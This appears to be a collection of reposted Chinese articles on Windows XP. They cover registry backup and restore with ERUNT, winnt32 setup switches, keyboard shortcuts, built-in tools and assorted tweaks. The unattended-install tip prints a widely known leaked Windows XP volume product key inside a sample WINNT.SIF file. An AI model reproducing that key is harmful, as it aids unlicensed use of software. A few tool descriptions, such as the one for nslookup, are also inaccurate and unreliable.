    软件性质:免费软件 适用平台:Windows NT/2000/XP
    下载地址:http://www.onlinedown.net/soft/32707.htm

    第二步：创建自动日期备份的批处理

    ERUNT有一个很方便的功能，可以在命令提示符状态下运行。利用它的一些参数，能够实现自动将注册表文件保存到以当天日期命名的文件夹中。

    打开一个文本文件，输入以下内容：
    C:\erunt\ERUNT.EXE %SystemRoot%\ERDNT\#Date# /noconfirmdelete
    第一部分是文件所在路径，第二部分是“备份到”的位置，也就是C:\WINNT\ERDNT目录，并以当前日期做为子文件夹名，“noconfirmdelete”表示如果存在同名文件夹则自动删除。

    将该文件保存为“backupreg.bat”，并放置在桌面上，以便随时使用。

    小提示

    免费奉送的注册表优化小工具

    在ERUNT所在的文件夹中，还有一个名为“NTREGOPT.EXE”的小工具，双击运行后，程序会自动扫描注册表，并提供一个“瘦身”前后注册表体积的报告，只要按下“OK”，即可完成注册表的优化。

    第三步：何时备份注册表

    虽然你可以将这个批处理文件放置在“开始→程序→启动”或是作为登录脚本，从而实现和Windows 98那样的Windows启动自动备份，或者利用“任务计划”进行定时备份，但我们认为这样并没有必要，其实备份注册表的最佳时机在于：更新系统文件或驱动程序、安装新程序前（保证Windows一切运行正常），或即将执行有风险操作，这时才需要双击这个批处理进行注册表备份，备份文件会保存到类似“C:\WINNT\ERDNT\2004-8-15”这样的文件夹中。

    第四步：恢复注册表

    如果系统还能正常启动，那么可以直接进入“C:\WINNT\ERDNT\”文件夹选择之前的备份子文件夹（比如：“2004-8-15”），然后运行其中的“ERDNT.EXE”进行注册表恢复。

    如果系统无法启动，你可以尝试在启动菜单中按F8键后选择“最后一次正确配置”，如果无效，可以再试着进入安全模式，如果都不成功，就需要采用下面的方法来恢复注册表了。

    方法一：如果安装有双系统，可以进入另一个正常的Windows，运行备份文件夹中的“ERDNT.EXE”进行恢复，如果在另一个Windows中盘符发生了变化，比如：C盘变为了D盘，恢复前，还要用记事本打开备份文件夹的“ERDNT.INF”文件，将其中所有的“C:”替换成“D:”。

    方法二：用Windows 2000/XP安装光盘启动系统，在安装欢迎菜单中按下R键，再按C键，进入故障恢复控制台，然后输入密码登录系统，接着输入“CD C:\WINNT\ERDNT”命令进入备份注册表文件的所在文件夹，接着再用CD命令进入相应备份文件夹，比如：“CD 2004-8-15”。

    然后输入“batch erdnt.con”命令并回车，这样备份的注册表文件便会被恢复，完成后输入“exit”退出故障恢复控制台。接下来系统会以所选择的注册表备份重启。

    小提示

    ★注册表无法恢复或恢复无效的情况

    设备或设备驱动程序损坏，恢复无效。
    系统文件损坏或丢失，恢复无效。
    硬盘发生逻辑或物理损坏或分区表错误，恢复无效。
    感染病毒没有清除干净，恢复无效。

    ★把故障恢复控制台装进硬盘

    每次都用Windows 2000/XP安装光盘来进入故障恢复控制台是不是有些麻烦？其实只要将安装光盘放入光驱，接着按下Win＋R组合键，输入“X:\i386\winnt32.exe /cmdcons”（其中“X”为光驱的盘符，请根据实际情况修改），回车后即可将故障恢复控制台装进硬盘，以后再恢复注册表，只要从启动菜单中选择故障恢复控制台的选项即可快速进入并进行恢复。


WIN XP 安装参数大揭密

《一键清理系统垃圾》

WIN XP 安装参数大揭密

我们先来看看winnt32.exe有哪些参数可以使用。

winnt32.exe位于i386目录里面。这个文件可以直接运行于windows下面，其具体参数有：

安装或升级到 Windows XP。在运行 Windows 95、Windows 98、Windows Me、WindowsNT、Windows 2000 或 Windows XP 的计算机上，可以从命令提示符中运行 winnt32。

语法：

winnt32 [/checkupgradeonly] [/cmd:command_line] [/cmdcons][/copydir:i386folder_name] [/copysource:folder_name] [/debug[level]:[filename]] [/dudisable] [/duprepare:pathname][/dushare:pathname] [/m:folder_name] [/makelocalsource] [/noreboot] [/s:sourcepath][/syspart:drive_letter][/tempdrive:drive_letter] [/udf:id [,UDB_file]] [/unattend[num]:[answer_file]]

参数：

/checkupgradeonly

检查计算机与 Windows XP 的升级兼容性。如果在使用该选项时使用了/unattend，则不需要用户输入。否则，结果将显示在屏幕上，并且可以用您指定的文件名保存它们。默认的文件名为 Upgrade.txt（位于systemroot 文件夹）。

/cmd:command_line

指示安装程序在执行最后阶段的安装前，运行一个特殊的命令。这将在计算机重新启动两次并且“安装程序”收集了必要的配置信息后，以及“安装程序”结束之前发生。

/cmdcons

在运行的计算机上将“故障恢复控制台”作为启动选项安装。恢复控制台是一个命令行界面，可以用它执行诸如启动和停止服务以及访问本地驱动器（包括 NTFS 格式的驱动器）这样的任务。只有在常规安装完毕后，才可以使用 /cmdcons 选项。

/copydir:i386folder_name

在安装 Windows XP 文件的文件夹内另外创建一个文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如，您可以在安装程序的 i386 源文件夹中创建名为 Private_drivers 的文件夹，用来存放驱动程序文件。然后，您可以键入 /copydir:i386Private_drivers 让安装程序将该文件夹复制到新安装的计算机上，并建立新的文件夹位置 systemrootPrivate_drivers。还可以使用/copydir 命令创建任意多个其他的文件夹。

/copysource:folder_name

在安装 Windows XP 文件的文件夹内另外创建一个临时文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如，您可以在安装程序的源文件夹中创建名为 Private_drivers 的文件夹，用来存放驱动程序文件。然后，您可以键入 /copysource:Private_drivers 以使安装程序将该文件夹复制到最新安装的计算机上，并在安装期间使用它的文件，从而建立临时文件夹位置systemrootPrivate_drivers。还可以使用 /copysource 命令创建任意多个其他的文件夹。与 /copydir 创建的文件夹不同，/copysource 创建的文件夹在安装完成后即被删除。

/debug[level]:[filename]在指定等级处创建调试日志，例如，/debug4:Debug.log。默认日志文件为:systemrootWinnt32.log，并且默认调试等级为 2。日志等级如下所示：0 -- 严重错误、1 -- 错误、2 -- 警告、3 -- 通知、4 -- 用于调试的详细信息。每个级别都在其下包括一些子级别。

/dudisable

禁用“动态更新”。没有“动态更新”，安装程序仅能在初始安装文件下运行。即使使用应答文件并在该文件中指定“动态更新”选项，该选项仍会禁用“动态更新”。

/dushare:pathname

将以前从 Windows Update 网站下载的“动态更新”文件（更新的文件在安装时使用）的目录指定为共享。当从安装共享处运行并使用 /duprepare 时，该选项将执行准备操作，这样，经过更新的文件才能在基于网络的客户端安装中使用。如果没有使用/duprepare 并且在客户端上运行，则指定客户端安装将使用位于 pathname 所指定的共享位置的更新文件。

/duprepare

进行安装共享准备，使从 Windows Update 网站下载的“动态更新”文件可以使用它。然后，该共享可用于多个客户端的 Windows XP 安装。只能与 /dushare 一起使用。

/m:folder_name

指定“安装程序”从备用位置复制替换文件。指导“安装程序”首先在备用位置中查看，如果有文件显示，则应使用这些文件而非默认位置中的文件。

/makelocalsource

指示安装程序将所有的安装源文件复制到本地硬盘上。当采用从光盘安装时，使用/makelocalsource 可以在以后没有光盘的情况下，为计算机提供安装文件。

/noreboot

指导“安装程序”在结束文件复制阶段之后不重新启动计算机，这样您就可以执行另一个命令。

/s:sourcepath

指定 Windows XP 文件的源位置。要同时从多个服务器复制文件，请多次键入

/s:sourcepath 选项（最多八次）。如果输入多次选项，则所指定的第一个服务器必须是可用的，否则“安装程序”失败。

/syspart:drive_letter

表明可以将安装启动文件复制到一个硬盘上，并将硬盘标记为活动，然后将该磁盘安装到其他计算机上。启动该计算机时，它将自动启动下一阶段的安装。但必须始终同时使用 /tempdrive 参数和 /syspart 参数。在运行 Windows NT 4.0、Windows 2000 或 Windows XP 的计算机上，可以使用/syspart 选项来启动 Winnt32。运行 Windows 95、Windows 98 或 Windows Me 的计算机不能使用该选项。

/tempdrive:drive_letter

指导安装程序将临时文件放置到指定部分。对于全新安装， 可以将 Windows XP 安装在指定的分区。对于升级安装，/tempdrive 选项仅影响临时文件的位置，而操作系统的升级则在运行 winnt32 的分区中进行。

/udf:id [,UDB_file]

指出安装程序用来指定“唯一数据库”(UDB) 文件如何修改应答文件的标识符 (id)（请参阅 /unattend 项）。UDF 会覆盖应答文件中的一些值，且标识符会决定使用 UDF 中的哪些值。例如，/udf:RAS_user,Our_company.udb 会覆盖Our_company.udb 文件中为 RAS_user 标识符指定的一些设置。如果没有指定 UDF_file，安装程序会提示用户插入一张含有Unique.udb 文件的磁盘。

/unattend

以无人参与的安装模式升级 Windows 98 或 Windows Me 以前的版本。因为所有用户设置都可以从上一次安装中获得，所以在安装过程中并不需要用户干预。

/unattend[num]:[answer_file]

在无人参与安装模式下执行干净安装。所指定的应答文件为安装程序提供了您自定义的设置信息。Num 是在安装程序结束复制这些文件与重新启动计算机之间间隔的秒数。在运行Windows 98、Windows Me、Windows NT、Windows 2000 或 Windows XP 的任何计算机上都可以使用 num 选项。如果使用 /unattend 命令行选项来自动完成安装程序，则表示您已经阅读和接受了Windows XP 的 Microsoft 许可协议。在代表某个组织而不是您自己使用该命令行选项来安装 Windows XP 之前，您必须确认最终用户（无论是个人还是单个实体）已经接收、阅读并接受 Windows XP 的 Microsoft 许可协议的条款。OEM 在销售给最终用户的机器上可能不会指定此值。


Win XP 键盘快捷键概述

《一键清理系统垃圾》

Win XP 键盘快捷键概述

2002-02-23　　　 作者：

    在 Win XP 中工作和Windows中工作时一样，利用快捷键代替鼠标。可以利用键盘快捷键打开、关闭和导航“开始”菜单、桌面、菜单、对话框以及网页。键盘还可以让您更简单地与计算机交互。

    单击一个标题或按 TAB 键可以突出显示这个标题，然后按 ENTER 键。

    一、常规键盘快捷键

按键 目的
Ctrl + C 复制。
Ctrl + X 剪切。
Ctrl + V 粘贴。
Ctrl + Z 撤消。
DELETE 删除。
Shift + Delete 永久删除所选项，而不将它放到“回收站”中。
拖动某一项时按 CTRL 复制所选项。
拖动某一项时按 CTRL + SHIFT 创建所选项目的快捷键。
F2 重新命名所选项目。
CTRL + 向右键 将插入点移动到下一个单词的起始处。
CTRL + 向左键 将插入点移动到前一个单词的起始处。
CTRL + 向下键 将插入点移动到下一段落的起始处。
CTRL + 向上键 将插入点移动到前一段落的起始处。
CTRL + SHIFT + 任何箭头键 突出显示一块文本。
SHIFT + 任何箭头键 在窗口或桌面上选择多项，或者选中文档中的文本。
Ctrl + A 选中全部内容。
F3 搜索文件或文件夹。
Alt + Enter 查看所选项目的属性。
Alt + F4 关闭当前项目或者退出当前程序。
ALT + Enter 显示所选对象的属性。
Alt + 空格键 为当前窗口打开快捷菜单。
Ctrl + F4 在允许同时打开多个文档的程序中关闭当前文档。
Alt + Tab 在打开的项目之间切换。
Alt + Esc 以项目打开的顺序循环切换。
F6 在窗口或桌面上循环切换屏幕元素。
F4 显示“我的电脑”和“Windows 资源管理器”中的“地址”栏列表。
Shift + F10 显示所选项的快捷菜单。
Alt + 空格键 显示当前窗口的“系统”菜单。
Ctrl + Esc 显示“开始”菜单。
ALT + 菜单名中带下划线的字母 显示相应的菜单。
在打开的菜单上显示的命令名称中带有下划线的字母 执行相应的命令。
F10 激活当前程序中的菜单条。
右箭头键 打开右边的下一菜单或者打开子菜单。
左箭头键 打开左边的下一菜单或者关闭子菜单。
F5 刷新当前窗口。
BackSpace 在“我的电脑”或“Windows 资源管理器”中查看上一层文件夹。
Esc 取消当前任务。
将光盘插入到 CD-ROM 驱动器时按 SHIFT 键 阻止光盘自动播放。

    二、对话框快捷键

按键 目的
Ctrl + Tab 在选项卡之间向前移动。
Ctrl + Shift +Tab 在选项卡之间向后移动。
Tab 在选项之间向前移动。
Shift + Tab 在选项之间向后移动。
ALT + 带下划线的字母 执行相应的命令或选中相应的选项。
Enter 执行活选项动或按钮所对应的命令。
空格键 如果活选项动是复选框，则选中或清除该复选框。
箭头键 活选项动是一组选项按钮时，请选中某个按钮。
F1 显示帮助。
F4 显示当前列表中的项目。
BackSpace 如果在“另存为”或“打开”对话框中选中了某个文件夹，则打开上一级文件夹。

    三、自然键盘快捷键

    在“Microsoft 自然键盘”或包含 Windows 徽标键(简称WIN) 和“应用程序”键(简称KEY) 的其他兼容键盘中，您可以使用以下快捷键。

按键 目的
WIN 显示或隐藏"开始"菜单。
WIN+ BREAK 显示"系统属性"对话框。
WIN+ D 显示桌面。
WIN+ M 最小化所有窗口。
WIN+ Shift + M 还原最小化的窗口。
WIN+ E 打开"我的电脑"。
WIN+ F 搜索文件或文件夹。
CTRL+WIN+ F 搜索计算机。
WIN+ F1 显示 Windows 帮助。
WIN+ L 如果连接到网络域，则锁定您的计算机，或者如果没有连接到网络域，则切换用户。
WIN+ R　打开"运行"对话框。
KEY 显示所选项的快捷菜单。
WIN+ U 打开"工具管理器"。

    四、辅助键盘快捷键

按键 目的
右侧 SHIFT 键八秒钟 切换“筛选键”的开和关。
左边的 ALT + 左边的 SHIFT + PRINT SCREEN 切换“高对比度”的开和关。
左边的 ALT + 左边的 SHIFT + NUM LOCK 切换“鼠标键”的开和关。
Shift 键五次 切换“粘滞键”的开和关。
Num Lock 键五秒钟 切换“切换键”的开和关。
WIN+ U 打开“工具管理器”。

    “Windows 资源管理器”键盘快捷键

按键 目的
END 显示当前窗口的底端。
主页 显示当前窗口的顶端。
NUM LOCK + 数字键盘的星号 (*) 显示所选文件夹的所有子文件夹。
NUM LOCK + 数字键盘的加号 (+) 显示所选文件夹的内容。
NUM LOCK + 数字键盘的减号 (-) 折叠所选的文件夹。
左箭头键 当前所选项处于展开状态时折叠该项，或选定其父文件夹。
右箭头键 当前所选项处于折叠状态时展开该项，或选定第一


Win XP的三条另类操作技巧

《一键清理系统垃圾》

Win XP的三条另类操作技巧

    现在许多朋友都在使用Windows XP系统，因此探索它的使用技巧以提高操作效率是每个电脑爱好者不懈的追求，笔者在使用Windows XP系统过程中也积累了一些小技巧，今天贡献出来与大家共同学习。

    1.查看Windows XP详细系统信息

    单击“开始”、“所有程序”、“附件”、“命令提示符”，输入“systeminfo”后回车，系统即开始检测相关信息，之后返回到当前窗口，我们就可以看到Windows XP设置的详细信息了。

    2.在命令提示符窗口中使用图形界面

    如果我们需要在Windows XP的“命令提示符”窗口中重复地输入一些比较长的命令，反复输入比较麻烦，我们可以按下F7键，出现图形界面，然后你就可以使用方向键非常方便地进行选择，按下回车键可以执行该命令。

    3.查看上网使用时间

    在Windows XP中，我们通过“事件查看器”可以查看我们过去的上网时间。方法为：打开“控制面板”，双击“管理工具”，然后打开“事件查看器”。在左侧的窗口中选择“系统”选项，单击鼠标右键，在弹出的快捷菜单中选择“属性”，在“系统属性”窗口中选择“筛选器”标签，在“事件来源”中选择“RemoteAccess”。单击“确定”按钮，回到“事件查看器”主窗口，在右边的窗口中就会显示出上网的开始时间和结束时间，相邻的两个时间中较早的就是你开始上网的时间，较晚的则是下线的时间。

    Windows XP系统的技巧很多，笔者在此只起一个“抛砖引玉”的作用，有兴趣的朋友可以在这方面多下点功夫。


WIN XP的十八般武艺

《一键清理系统垃圾》

WIN XP的十八般武艺

Ｗｉｎｄｏｗｓ ＸＰ里有我们常用到的工具如磁盘清理程序等等，那么它们到底叫什么名字，又躲在硬盘的哪个地方呢？笔者这就把它们挖掘出来，以后大家再用这些工具的时候就不用一步一步地去找地方了，直接点击“开始→运行”，再输入程序名就ＯＫ了。

1.磁盘清理大师——Ｃｌｅａｎｍｇｒ

用来自动地释放出一部分硬盘空间，并会智能化地进行删除操作。

2.剪贴板查看器——Ｃｌｉｐｂｒｄ

Ｗｉｎｄｏｗｓ ＸＰ中的剪贴板查看器程序较原先Ｗｉｎｄｏｗｓ ９Ｘ／Ｍｅ的旧版本多出了共享功能，通过设置权限允许其他网上用户将该剪贴板装入使用。

3.控制面板启动器——Ｃｏｎｔｒｏｌ

快速启动控制面板。

4.Ｗｉｎｄｏｗｓ ＸＰ的诊断医生——Ｄｒｗｔｓｎ３２

Ｄｒｗｔｓｎ３２是一个程序错误调试器。运行后会获得并记录系统中程序错误的信息，并创建一个文本文件ｄｒｗｔｓｎ３２．ｌｏｇ，提供错误原因的详细说明，并给出解决问题的建议性操作。

5.ＤＶＤ播放器——Ｄｖｄｐｌａｙ

Ｗｉｎｄｏｗｓ ＸＰ提供的一个“免费”的ＤＶＤ播放器，也就是Ｗｉｎｄｏｗｓ Ｍｅｄｉａ Ｐｌａｙｅｒ。

6.自解压文件制作工具——Ｉｅｘｐｒｅｓｓ

利用Ｉｅｘｐｒｅｓｓ可制作两种自解压文件，一种是标准自解压文件，另一种是安装程序式自解压文件。

7.备份工具——Ｎｔｂａｃｋｕｐ

Ｗｉｎｄｏｗｓ ＸＰ中内置的备份工具。

8.ＩＰ地址侦测器——Ｎｓｌｏｏｋｕｐ

通过这个ＩＰ侦测工具ｐｉｎｇ就可以轻而易举地得到它们的真正ＩＰ地址。

9.注册表编辑器增强版——Ｒｅｇｅｄｔ３２

用来修改注册表设置的高级工具。

10.Ｗｉｎｄｏｗｓ升级程序——Ｗｕｐｄｍｇｒ

联上网后，可以通过此程序进行Ｗｉｎｄｏｗｓ的自动升级。

11.共享文件夹设置工具——Ｓｈｒｐｕｂｗ

它的作用与右击一文件夹，选择“共享”基本上等价。

12.Ｍｉｃｒｏｓｏｆｔ签字验证工具——Ｓｉｇｖｅｒｉｆ

所谓“签署的文件”，就是被授予Ｍｉｃｒｏｓｏｆｔ数字签署的文件。该签署表明，该文件是原始文件的一模一样的副本。通过ｍｉｃｒｏｓｏｆｔ签字验证工具，我们可在计算机上查找已签署和未签署的文件，也可查看签署文件的身份验证，以确认该文件还没有被篡改。

13.音量控制程序——Ｓｎｄｖｏｌ３２

平时双击任务栏上的小喇叭就会出现的音量控制程序。

14.任务管理器——Ｔａｓｋｍｇｒ

使用任务管理器可快速查看正在运行的程序的状态，或终止已停止响应的程序，也可以查看ＣＰＵ和内存使用的情况。

15.远程连接程序——Ｔｅｌｎｅｔ

Ｗｉｎｄｏｗｓ自带的纯中文界面的远程连接程序。

16.系统文件检查器——Ｓｆｃ

使用Ｗｉｎｄｏｗｓ难免会出现系统文件损坏或丢失的毛病，而如果为了几个小小的文件就去重装系统，又显得稍微麻烦了一些。通过系统文件检查器Ｓｆｃ．ｅｘｅ，一切都会变得非常简单。

以上１６个程序都在系统盘的ＷＩＮＤＯＷＳ＼ＳＹＳＴＥＭ３２文件夹下。

17.文件转移向导——ＭｉｇｗｉｚＷＩＮＤＯＷＳ＼ＳＹＳＴＥＭ３２＼ｕｓｍｔ文件夹下

通过它，我们就可以实现系统状态的备份与恢复。

18.系统配置程序——Ｍｓｃｏｎｆｉｇｗｉｎｄｏｗｓ＼ｐｃｈｅａｌｔｈ＼ｈｅｌｐｃｔｒ＼ｂｉｎａｒｉｅｓ文件夹下

和Ｗｉｎｄｏｗｓ中的系统配置程序一样，通过这个程序，我们可对系统的一般、ｓｙｓｔｅｍ．ｉｎｉ、ｗｉｎ．ｉｎｉ、ｂｏｏｔ．ｉｎｉ、服务和启动项目进行修改。


Win XP高级技巧与应用（二）

《一键清理系统垃圾》

Win XP高级技巧与应用（二）

    9[辨认真假中文版XP]

    下面这个方法是用来查看是否你的Win XP为真正的正文版的。1.执行超级终端机.是否为中文接口及中文名称。如果你的Win XP是英文汉化的，那么在这里肯定会露出马脚。 2.运行dxdiag.exe，如果不行，到system32里找到这个文件（注意要显示所有系统文件后才能找到）.看看directx诊断程序中的系统信息 ，看看系统信息中的操作系统版本是否为5.1build2600 ，看看系统信息中的语言及区域设定是否都为中文 。

    10[安装Win XP不用输序号]

    要做到安装Win XP不用输序号（是不用输，不是不用序号）要有一个前提，就是你的Win XP原文件已经考到了你的硬盘上或者你的光盘是可读写的。方法如下：在I386的文件下放一个叫WINNT.SIF的， 内容如下：

    =====================================================================
    [UserData] ProductKey=FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
    //注意，这个是你的xp 的注册码，要写在这里，不一定与这个相同
    [Data] AutoPartition=0
    MSDosInitiated=0
    UnattendedInstall=Yes
    [Unattended]
    UnattendMode=GuiAttended
    TargetPath=WINNT
    Hibernation=1
    OemPreinstall=No
    OemSkipEula=Yes
    CrashDumpSetting=0
    DisableDynamicUpdates=Yes
    UnattendSwitch=Yes
    =====================================================================

11[一键完成网络诊断]

    要进行网络诊断，你可以用命令提示符里的相关命令，比如ping，但这些诊断是不全的，要做一个完整的网络诊断，只有在Win XP的帮助中心才能实现，打开“开始”-->“帮助与支持”，在其中找到网络诊断（用搜索搜一下，如果你找不到的话），只要按一下“扫描您的系统”，就可以完成所有的网络诊断，扫描完后，它会给出制作的很漂亮的报告（比命令提示符可好多了，这才叫xp（experience）吗），这个报告即给出了文字的结果，也给出了十分详细的数据，无论是一般用户，还是系统工程师都用的上它。

    12[减少协议开销]

    有许多朋友要做一个浪费资源的行为，就是安装许多网络协议，原因可能是因为他们不清楚这些协议到底是干什么用的，所以就把所有的协议都装了。其实装很多协议是很不好的，你要什么协议就装什么协议，不知道可以试试，和找些资料看，多装协议怎么浪费资源呢？多余的协议：1浪费内存，2降低效率，当一个程序或服务向网路发出请求任务时，系统会在所有的协议中寻找所请求的的服务器或服务，而且，它需要在接受到协议的响应后才能够选定协议，并建立连接，所以这样就会延长时间。

    13[关掉快速切换功能]

    Win XP的一个很引人注目的功能叫做“快速切换”，这个功能为许多人在同一时间使用电脑提供了可能，但是要注意每一项功能总是伴随着资源的损失，如果你的内存少与64M，Win XP在装的时候就被自动禁止掉了，因为这样会使本来就已捉襟见肘的内存的压力更加大，对128M的用户来说，开这个功能虽然没什么关系，但是你又不是很需要这项功能，所以建议把这个功能给关掉。方法如下：控制面板-->用户帐户，点击“更改用户登陆或注销方式”，去掉“使用快速用户切换”就可以了。

    14[Win XP也玩文件夹背景]

    在Win XP以前，我们都可以设置文件夹背景，比如你打开一个文件夹，你可以设置一幅赏心悦目的背景图，这样会增加“XP”，但是Win XP中却没有这项功能。可是很奇怪我的一个朋友的Win XP却可以设置背景。其实他也不是设置，他是从win2000升级到Win XP的，在win2000中他设置了背景，在Win XP中，这个背景还是有效的，我花了些时间终于找到了原因，原来有背景的文件夹里都有个desktop.ini文件，于是我在自己的机器上找，找到了很多desktop.ini，但是这些都没有用，大概是Win XP去除了这项功能之后，所有的desktop.ini里就没了设置文件夹背景的参数，但是我的朋友的Win XP还有背景说明Win XP还是能解释这些参数，于是我把朋友的desktop.ini拷过来，果然有效，所以这里把这个desktop.ini贴出来，大家就可以在Win XP中设置背景了。

    ======================================================================
    [ExtShellFolderViews]
    {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
    [{BE098140-A513-11D0-A3A4-00C04FD706EC}]
    Attributes=1
    IconArea_Image=E:\picture\girl2\19.jpg
    //这里设置你的背景图片的路径
    [.ShellClassInfo]
    ConfirmFileOp=0
    ======================================================================

15[把网页，图片置于桌面]

    你可以让你的左面图片随时变，你可以把你喜欢的网页一直放在桌面上。这些都是用了Win XP的桌面web功能。方法如下：在桌面上点右键，选择“属性”选项卡，点击自定义桌面，然后在新的对话框中选择“web”，然后“新建”，在又一个新的对话框中，你可以填入n幅图片的路径，这样，这些图片都会出现在桌面，你可以随便选择一幅作为你的桌面图片；你也可以填入n个网页的地址，这样这些网页就会出现在桌面，你可以随时调来浏览，不过这些网页本身是“死”的，尽管你可以点击，但他会打开IE，这个web页实际上被作为图标放在那里了，它的功能是使你的左面变的玄一点。

    16[无桌面操作]

    这里首先要讲一下桌面的概念，也许你已经习惯于把桌面等同与你的显示器平面了，其实严格的讲，桌面是一个特殊的explore程序，是操作体统给用户的一个shell。这里所说的无桌面操作也就是把这个shell关掉的操作，可不是没有显示器的操作（这叫盲操作）。先打开任务管理器，你可以在任务栏上点右键，或者直接按 CTRL＋ALT＋DEL，然后选择“进程”选项卡。找到explore.exe，然后结束这个进程，系统会给一个警告，告诉你说会有丢失数据的危险，不用管他，然后你会发现你的桌面丢了，你的任务栏没了，你的桌面图标也没了，只剩下你的桌面图片了（实际上桌面图片也没了，但是桌面图片已在你的内存中了，所以你还能看到它），你的鼠标还能用，但你无论左键点，还是右键点都没有什么响应了，ok，good，你的桌面没了。这时怎么操作呢？－－用任务管理器，其实你运行的所有程序只不过是一个一个的任务，当然你也可以在任务管理器里实现所有任务的管理，windows提供给我们桌面是为了操作方面，给用户一个友善的interface。我们这样做有什么好处呢，显而易见，explore.exe不运行了可以节省系统资源，如果你的内存少的实在惨不忍睹，那么就试试无桌面操作吧。

这任务管理器的“应用程序”栏，你可以实现打开程序（点“新任务”按钮），关掉程序（点“结束任务”按钮），你可以最大最小化程序窗口，在应用程序的图标上点右键就知道怎么做了——这件事也可以在菜单栏的“窗口”中做。在“关机”菜单栏中，你可以完成待机，重启，关机，休眠，注销，锁定。

    17[优化程序运行]

    程序运行有他们各自的优先次序，所有程序都要占用处理器资源，处理器处理任务有一个先后次序，一般的计算机中有31个优先等级，系统的内核占据了最高的一些等级，这样就能保证系统的稳定，而普通的应用程序一般在比较后面的等级。在普通应用程序中间也有优先次序，他们本来在处理器面前是人人平等的，但还是有些细微的差别，前台的程序（当前正在使用）的优先级要比后台的程序高。

    你可以自己调节应用程序的优先级，打开任务管理器，点到“进程”选项卡，选一个应用程序的进程，点击右键，会弹出一个快捷菜单，选择“设置优先级”，这里有6个等级：实时，高，高与标准，标准，低于标准，低。你可以让你的程序强行调度到更高或更低（自然为别的程序腾出了资源）的等级。如果你不知道某个应用程序的具体进程，可以如下操作：点到“应用程序”选项卡，右键点中一个任务，选择“转到进程”，就会转到该程序的进程，这样你就找到了该程序的进程了。

    好了，上面这18个操作技巧怎么样，如果不是每个都很好，总有几个是你喜欢的吧^_^.还有一个不算秘密的秘密我要告诉大家，重装系统真是提高系统性能的好办法，无论你怎么保养，系统用久了总是会出许多大小毛病的，这些毛病很难医治，只有重头来过才是好办法，你的系统用了很长时间之后重装一次，刚装完时你就能深切地感受到这里的差距了，重装也不繁的（要改变的是观念），Win XP也就1个小时，你作磁盘整理也差不多需要这么多时间的，不过这里要提醒一句，你要把你的email，documents等等资料放到别的系统盘之外，以免丢了资料。还有一个经验，不要长时间地使用休眠，这样会不知不觉地出很多问题，每次启动其实都启动一种“重新来过”的作用，有时出了问题，只要重启一下就可以了，就是这个道理。


Win XP高级技巧与应用（一）

《一键清理系统垃圾》

Win XP高级技巧与应用（一）

    Win XP推出后，有关Win XP的操作技巧和优化技巧的信息自然也会随之而来，本文将给大家展示一些Win XP的操作技巧（有些是优化技巧，有些是专门针对Win XP的），大部分内容是独创（原创）的——一些在网上出现过的内容，尽可能避免雷同（如有雷同，纯属巧合，^_^），相信对网友们一定有用。
    1[虚拟桌面管理，轻松拥有4个桌面]

    以前我们使用windows操作系统的时候要想有多个桌面，就要装专门的软件。在Win XP中你不需要装这种软件就可以拥有4个桌面。将鼠标指到任务栏，点右键－－>工具－－>desktop manager（虚拟桌面管理器，部分版本没有此项功能）.在任务栏的右下角就会出现5个按钮，这5个按钮分别代表4个桌面和一个预览（4个桌面一起出现在屏幕上）。当你第一次使用这项功能时，这4个桌面的设置都是当前桌面的设置，你可以在此基础上设计个性化的桌面。

    使用这个虚拟桌面管理器要比你想象的稍微复杂一些。在任务栏中的虚拟桌面管理器上点右键，在弹出菜单中选择“configure desktop images”，会出现一个叫“MSVDM settings”的对话框，点击“desktop”选项卡，在这个选项卡上，你可以分别设置4个桌面的背景，至于具体怎么设，大家一看一试就知道了，这里从略。同是在“MSVDM settings”对话框里，有个“shortcut keys”的选项卡，这个选项卡上可以设置4个桌面以及预览的快捷键，默认的是windows徽标键加1，2，3，4，和V。如果使用快捷键，你就可以隐藏虚拟桌面管理器，为任务栏腾出更多的空间。

    在虚拟桌面中，各个桌面可以有自己的背景，自己的桌面设置，你在桌面1上开的程序的窗口在其他桌面上是不显示的，但在任务栏上，该程序的按钮还是在的，点一下就可以在其他桌面打开了。你也可以使在不同桌面下运行的程序在别的桌面上不能打开，使各个桌面各自有各自的程序。在虚拟桌面管理器上点右键，在弹出菜单中去掉“shared desktop”前面的勾即可。

    2[任务栏放大镜，桌面图文清晰可见]

    Win XP设计的适用对象是很广泛的，他考虑到各种轻度残疾的人士，所以Win XP的附件下面有个“辅助工具”，方便听觉和视力差的人使用该操作系统。其实除了这些，任务栏本身就有一个放大镜工具（跟辅助工具里的那个是不一样的，那个是在桌面屏幕的上方显示的，面积大，而这个是在任务栏里显示的，面积小）。在任务栏上右击，选工具栏，在下级菜单中选择“taskbar magnifier”，然后任务栏右方就会出现一个“小方框”，里面有放大图（鼠标所指处），这个图象的放大倍数是可以自定义的，在“小方框”上点右键，在弹出的“zoom”子菜单里选择放大倍数。这个“小方框”很小，如果想大一点，可以拉宽任务栏。

3[“地址”“链接”和“桌面”，访问文件网页更方便]

    右键点击任务栏的空白处，在弹出的菜单中选择“工具栏”，然后分别选择子菜单中的“地址”，“链接”和“桌面”。

    将这些工具放在任务栏可以方便很多，比如你要访问一个网站，可以直接在地址栏里键入网址（如果接上了internet的话），也可以在这里键入比如“D：\”来直接访问各个磁盘，要读软驱就键入“A:\”，要读光驱就直接键入“G:\”（如果光驱时G的话），要发邮件吗？在地址栏里键入“mail to ＋信箱地址”就可以了。链接的作用就不用讲了，大家都知道。那个叫桌面的东东可好用了，你访问文件（如果有很多文件，需要找的话），可以在这里找，这个“桌面”把所有文件都排成树形结构，所有文件及其结构都一目了然，方便了许多。

    你还可以直接访问网站，在一般情况下，当我们想登录到某网站时，都必须先启动Internet Explorer，其实，只要我们单击“开始”→“运行”（或者，win键＋R），并在“打开”项上直接输入网址，系统就会为你连接到相应的网站。如果你在系统中设置了自动拨号的话，它还会为你自动拨号，非常方便。

    4[语言栏：文字，语音，和手写]

